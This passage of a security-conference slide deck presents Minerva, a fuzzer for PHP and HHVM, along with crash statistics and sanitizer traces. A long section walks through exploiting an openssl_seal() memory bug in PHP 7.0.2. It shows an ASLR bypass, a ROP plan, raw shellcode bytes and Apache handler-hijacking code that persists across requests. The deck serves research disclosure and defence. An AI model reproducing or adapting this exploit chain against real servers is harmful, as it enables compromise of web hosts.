  • 16. Minerva - example script (dummy type) <?php [...] $var0 = stream_context_get_default(); $var1 = is_object($var0); $var2 = pcntl_wait($var0,$var1); $var3 = create_function($var1,$var0); $var4 = stream_context_create(); $var5 = ftp_rawlist($var3,$var4,$var3); $var6 = is_dir($var2); $var7 = preg_filter($var4,$var3,$var5,$var3,$var2); $var8 = is_float($var7); $var9 = openssl_pkey_export_to_file($var3,$var1,$var5); [...]
  • 17. Minerva - example script (proper types) <?php [...] $var0 = inet_ntop($b); $var1 = readline_write_history(); $var2 = urlencode($str_1); $var3 = rtrim($str_3,$str_3); $var4 = dba_handlers(); $var5 = stream_context_create(); $var6 = idate($str_3); $var7 = ftp_rawlist($var5,$var2); $var8 = ksort($var7); $var9 = use_soap_error_handler(); [...]
  • 18. Minerva - template +-------------------+ | header | - header file (i.e. <?php) +-------------------+ | init | - initialization (variables etc.) +-------------------+ | generated script | - minerva algorithm . . . . | | +-------------------+ | fini | - destructors +-------------------+ | footer | - footer file (i.e. ?>) +-------------------+
  • 19. Minerva - configuration file main { default_length = 100; default_output = output.php; init = conf/init.php; fini = conf/fini.php; modules = [ standard, sqlite ]; ignore_functions = [sleep, leak_variable, (...)]; } functions { standard = [ dummy zend_version(void), dummy func_num_args(void), [...] ];
  • 20. Our approach: source: http://www.jtpedals.com we use something(tm) to cluster crashes we use Jenkins to automate things more on our thoughts about fuzzing: http://www.slideshare.net/slajdszer/fuzzing-challenges-alligatorcon
  • 21. Tips & tricks start with small scripts (crashes generated by large ones are likely unreproducible) do not stress SSD drives you want to use Address Sanitizer (or other sanitizers) USE ZEND ALLOC = 0 - use libc allocator instead of internal one learn to automate (dedup crashes etc.) timelimit(1) is very useful!
  • 22. Tips & tricks source: http://pearlsofpromiseministries.com OpenGrok - http://lxr.php.net/ HHVM has bug bounty run by Facebook https://github.com/facebook/hhvm PHP bugs are awarded by IBB bug bounty https://hackerone.com/ibb-php
  • 23. The results - PHP 7.x - (HEAD) source: http://images.phpgang.com one machine: 8 cores + 16 GB ram + SSD 5 days + 8 threads = around 4 millions executions cost: arount 30 PLN = 7.5 USD 10-50 lines of code generated per test case around 4150 crashes (55 were unique): 1. unknown crash - 24 2. segmentation fault - 19 3. heap use after free - 6 4. heap buffer overflow - 4 5. stack buffer overflow - 1 6. double free - 1
  • 24. The results - HHVM (HEAD) source: http://www.clipartbest.com one machine: 8 cores + 16 GB ram + SSD 5 days + 4 threads = around 800 thousands executions cost: arount 30 PLN = 7.5 USD 10-50 lines of code generated per test case around 956 crashes (63 were unique): 1. unknown crash - 33 2. segmentation fault - 19 3. heap-use-after-free - 6 4. heap-buffer-overflow - 5
  • 25. The results - distribution of crashes
  • 26. HHVM - HPHP::f dirname - heap-overflow <?php pathinfo("x00"); HPHP::f_dirname (path=...) at /src/hhvm/hphp/runtime/ext/std/ext_std_file.cpp: [...] 1870 char *buf = strndup(path.data(), path.size()); 1871 int len = FileUtil::dirname_helper(buf, path.size()); [...] ==27833==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000239e11 at pc 0x7b83c11 bp 0x7fffffffb430 sp 0x7fffffffb428 WRITE of size 1 at 0x602000239e11 thread T0 #0 0x7b83c10 in HPHP::FileUtil::dirname_helper(char*, int) /src/hhvm/hphp/runtime/base/file-util.cpp:348
  • 27. PHP - error reporting - use-after-free <?php error_reporting(1); $var11 = date_create_immutable(); $var16 = error_reporting($var11); Log: Fixed bug #72162 (use-after-free - error_reporting) Log: Fix bug #72162 (again) Log: Revert "Fix bug #72162 (again)" ==15187== ERROR: AddressSanitizer: heap-use-after-free on address 0x600600023235 at pc 0xf89a78 bp 0x7fff001c2ec0 sp 0x7fff001c2eb8 READ of size 1 at 0x600600023235 thread T0
  • 28. PHP - pcntl wait/pcntl waitpid <?php $b = 666; $c = &$b; $var5 = pcntl_wait($b,0,$c); unset($b); - convert_to_long_ex(z_status); - - status = Z_LVAL_P(z_status); + status = zval_get_long(z_status); array_init(z_rusage); - Z_LVAL_P(z_status) = status; + zval_dtor(z_status); + ZVAL_LONG(z_status, status); ==5772== ERROR: AddressSanitizer: SEGV on unknown address 0x0000000002a0 (pc 0x0000010d9674 sp 0x7fff2006d5a0 bp 0x7fff2006d650 T0)
  • 29. Exploiting bugs - PHP & HEAP related problems heap overflows use-after-free - unserialize() - CVE-2015-0273 double frees - imap open() - CVE-2010-4150 5.x era allocator description - http://php-security.org/2010/05/ 07/mops-submission-03-sqlite˙single˙query-sqlite˙array˙ query-uninitialized-memory-usage/index.html#˙˙exploitation FWIW, allocator is LIFO queue usually scenario is pretty much the same: take control over zval/array memory guts
  • 30. Exploiting bugs - PHP & other bugs similary like in the other software uninitialized memory access - sqlite array query() - http:// php-security.org/2010/05/07/mops-submission-03-sqlite˙single˙ query-sqlite˙array˙query-uninitialized-memory-usage/index.html heap is your friend (in a non-debug builds) everything with a dtor func t is your friend e.g.: 176 struct _zend_array { 177 zend_refcounted_h gc; [...] 195 dtor_func_t pDestructor; 196 }; http://lxr.php.net/xref/PHP˙7˙0/Zend/zend˙types.h#195
  • 31. Example - openssl seal() in 2011 we hijacked all connections to the webserver using buffer overflow in socket connect() - http://seclists.org/fulldisclosure/2011/May/472 minerva found uninitialized memory usage in openssl seal(). How hard would it be to do the same in 2016? we assume to operate on Ubuntu 14.04 LTS with Apache 2.4.7 and PHP 7.0.2 (compiled manually as most distros still use 5.x branch).
  • 32. openssl seal() - the bug - 1/2 4888 /* {{{ proto int openssl_seal(string data, &string sealdata, & 4889 Seals data */ 4890 PHP_FUNCTION(openssl_seal) 4891 { 4892 zval *pubkeys, *pubkey, *sealdata, *ekeys, *iv = NULL; [...] 4935 pkeys = safe_emalloc(nkeys, sizeof(*pkeys), 0); [...] 4942 /* get the public keys we are using to seal this data */ 4943 i = 0; 4944 ZEND_HASH_FOREACH_VAL(pubkeysht, pubkey) { 4945 pkeys[i] = php_openssl_evp_from_zval(pubkey, 1, NULL, 0, &key_resources[i]); 4946 if (pkeys[i] == NULL) { 4949 goto clean_exit; http://lxr.php.net/xref/PHP˙7˙0/ext/openssl/openssl.c
  • 33. openssl seal() - the bug - 2/2 [...] 5000 clean_exit: 5001 for (i=0; i<nkeys; i++) { 5002 if (key_resources[i] == NULL) { 5003 EVP_PKEY_free(pkeys[i]); [...] http://lxr.php.net/xref/PHP˙7˙0/ext/openssl/openssl.c
  • 34. openssl seal() - is it exploitable? 376 void EVP_PKEY_free(EVP_PKEY *x) 377 { [...] 380 if (x == NULL) 381 return; 383 i = CRYPTO_add(&x->references, -1, CRYPTO_LOCK_EVP_PKEY); 387 if (i > 0) 388 return; 395 EVP_PKEY_free_it(x); [...] 401 static void EVP_PKEY_free_it(EVP_PKEY *x) 402 { 403 if (x->ameth && x->ameth->pkey_free) { 404 x->ameth->pkey_free(x); [...]
  • 35. openssl seal() - our plan 1. Stage 1 (pwning PHP) 1.1 control uninitialized memory 1.2 get (or guess) pointer that will act as a fake EVP PKEY structure 1.3 push that pointer as a value to EVP PKEY free() 1.4 basing on guesses (or leaks) build a ROP chain allowing us to execute data 1.5 execute the 2nd stage shellcode 2. Stage 2 (pwning Apache) 2.1 guess/find handlers addresses 2.2 overwrite first handler with ours evil one 2.3 get back home (do not crash apache child)
  • 36. openssl seal() - RIP control ~/src/php-7.0.2/sapi/cli$ gdb ./php (gdb) r -r ’str_repeat("A", 512); openssl_seal($_, $_, $_, array_fill(0,64,0));’ Starting program: /home/rj4/src/php-7.0.2/sapi/cli/php -r ’str_repeat("A", 512); openssl_seal($_, $_, $_, array_fill(0,64,0));’ [...] 0x00007ffff5a3d837 in CRYPTO_add_lock () from /lib/x86_64-linux-gnu/libc[...] (gdb) x/i $rip => 0x7ffff5a3d837 <CRYPTO_add_lock+71>: add (%r12),%r13d (gdb) i r [...] r12 0x208 520 (gdb) print pkeys[i] $11 = (EVP_PKEY *) 0x200 (gdb) print pkeys[i+1] $12 = (EVP_PKEY *) 0x4141414141414141 (gdb) print pkeys[i+2] $13 = (EVP_PKEY *) 0x4141414141414141
  • 37. openssl seal() - RIP control ~/src/php-7.0.2/sapi/cli$ cat 2.php <?php $pem = " -----BEGIN PUBLIC KEY----- MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRANG2dvm8oNiH3IciNd44VZcCAwEAAQ== -----END PUBLIC KEY-----"; /* Random RSA key */ $a = array_fill(0,64,0); $k = openssl_pkey_get_public($pem); $a[0] = $k; $a[1] = $k; $a[2] = $k; var_dump($k); str_repeat("A", 512); openssl_seal($_, $_, $_, $a); ~/src/php-7.0.2/sapi/cli$ gdb ./php [...]
  • 38. openssl seal() - RIP control (gdb) r 2.php [...] (gdb) print pkeys[i] $1 = (EVP_PKEY *) 0x4141414141414141
  • 39. openssl seal() - Memory layout pkeys (openssl_seal()) +----------+----------+----------+----------+----- | pkeys[0] | pkeys[1] | pkeys[2] | pkeys[3] | ... +----------+----------+----------+----------+--- | +------------------------------------+ v EVP_PKEY +------+-----------+------------+-------+----- | type | save_type | references | ameth | ... +------+-----------+------------+-------+--- | +------------------------------------+ v EVP_PKEY_ASN1_METHOD +---------+--- -+-----------+---- | pkey_id | ... | pkey_free | ... +---------+- ---+-----------+---
  • 40. openssl seal() - ASLR bypass <?php function get_maps() { $fh = fopen("/proc/self/maps", "r"); $maps = fread($fh, 31337^2); fclose($fh); return explode("n", $maps); } [...] $pre = get_maps(); $buffer = str_repeat("x00", 0xff0000); $post = get_maps(); $tmp = array_diff($post, $pre); $tmp = explode(’-’, array_values($tmp)[0])[0]; for ($i = 0; $i < 8; $i++) $buffer[0xff + 12 + $i] = pack(’P’, $addr)[$i]; [...]
  • 41. openssl seal() - ROP we use ROP technique to neutralise NX we ended up using gadgets from the PHP binary to pivot the stack we used the address of our controlled buffer, which luckily was on the stack then we call mprotect() and set RWX perms exploit code is here: http://akat1.pl/?id=1
  • 42. openssl seal() - pwning PHP ~/src/php-7.0.2-test/sapi/cli$ ./php 3.php [+] buffer string @ 0x7f00ef400014 [+] faking EVP_PKEY @ 0x7f00ef400113 [+] faking ASN @ 0x7f00ef400113 [+] faking pkey_free @ 0x7f00ef4001af = a59203 [+] libc base @ 0x7f00f1540000 [+] mprotect @ 0x7f00f1634a20 [+] building ropchain [+] triggering openssl_seal(), spawning shell have phun... $
  • 43. openssl seal() - it’s so useless source: http://www.ifunny.com
  • 44. openssl seal() - hijacking apache2 requests source: http://linuxconfig.net Here’s what we want to do: 1. register memory that will survive subsequent requests 2. copy Apache handler code to the registered memory 3. register request handler that will be run really first 4. do something to clean the corrupted state and let Apache child process happily serve subsequent requests
  • 45. openssl seal() - shellcode - 1-3 steps void shellcode(void *(mmap_addr)(void *, size_t, int, int, int, off_t), void *(memcpy_addr)(void *, void *, size_t), int (*ap_hook_quick_handler_addr)(void *, void *, void *, int), unsigned char *handler, size_t len) { void *handler_space; unsigned char *p; /* create space for our handler, as it needs to survive sequential * requests */ p = handler_space = mmap_addr(0, 0x2000, PROT_WRITE|PROT_EXEC|PROT_READ, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); /* ~memcpy(3) */ while(len--) *(p++) = *(handler++); /* register new filter */ ap_hook_quick_handler_addr(handler_space, NULL, NULL, APR_HOOK_REALLY_FIRST); }
  • 46. openssl seal() - shellcode - handler #define APR_HOOK_REALLY_FIRST (-10) #define OK (0) int handler(void *r) { void (*ap_rprintf_addr)(char *, void *) = (void *)0xdead; char content[16] = "hello world"; (ap_rprintf_addr)(r, content); return OK; }
  • 47. openssl seal() - how to survive the PHP has a mechanism that kills scripts that run for too long which it is based on signals. if we deliver SIGPROF signal to the process, then PHP will take care of recovering our victim for us. $shellcode_stage1 = str_repeat("x90",512) . "x48xb8" . pack(’P’, $buffer_base + 0x2018) . // movabs shellcode_stage2, %rax "x49xb8" . pack(’P’, 0x1000) . // handler size "x48xb9" . pack(’P’, $buffer_base + 0x3018) . // handler "x48xba" . pack(’P’, $ap_hook_handler_addr) . // movabs ap_hook_quick_handler, %rdx "x48xbe" . pack(’P’, 0) . // UNUSED "x48xbf" . pack(’P’, $mmap_addr) . // movabs mmap,%rdi "xffxd0" . // callq %rax "xb8x27x00x00x00" . // mov $0x27,%eax - getpid syscall "x0fx05" . // syscall "xbex1bx00x00x00" . // mov $0xd,%esi - SIGPROF "x89xc7" . // mov %eax,%edi - pid "xb8x3ex00x00x00" . // mov $0x3e,%eax - kill syscall "x0fx05"; // syscall
  • 48. openssl seal() - pwning apache2handler $ curl http://localhost:10080/~rj4/exp.php [+] buffer string @ 0x7f3d66c00014 [+] faking EVP_PKEY @ 0x7f3d66c00113 [+] faking ASN @ 0x7f3d66c00113 [...] [+] mmap @ 0x7f3d763c49c0 [+] apache2 base @ 0x7f3d77180000 [+] ap_rprintf @ 0x7f3d771c29c0 [+] ap_hook_quick_handler @ 0x7f3d771d6c00 [+] building ropchain [+] spraying heap [+] triggering openssl_seal()... execute it a few times to infect all children
  • 49. openssl seal() - pwning apache2handler - result source: https://marinasleeps.files.wordpress.com/ $ curl http://localhost:10080/~rj4/exp.php Hello World! $ curl http://localhost:10080/whatever Hello World!
  • 50. Why should I care? source: http://www.badideatshirts.com/ apache2 + mod php is a quite popular configuration (more than 650 thousands servers according to shodan.io search) this attack vector can be used to bypass disabled functoins (easier methods exists, it’s just another one) running buggy software is risky there are other bugs...
  • 51. What can I do? source: http://cdn.quotesgram.com/ keep your software up2date unload unnecessary extensions do not rely on disabled functions do not rely on open basedir do not run PHP as mod php do not trust your software
  • 52. Future work port Minerva to any language → Minerva$lang code coverage improvement for now we ignore the fact that PHP is object-oriented language generate language constructs variables mutation test case minimization use code coverage as input to fuzzer (like in AFL or autodafe) implement type casts implement mocks for some backends ...your ideas.
  • 53. Credits Large parts of this presentation were done in cooperation with Marek Kroemeke and Filip Palian, THANKS!
  • 55. Time for questions (and maybe answers) Q&A m.kocielski@logicaltrust.net http://akat1.pl/ @akat1 pl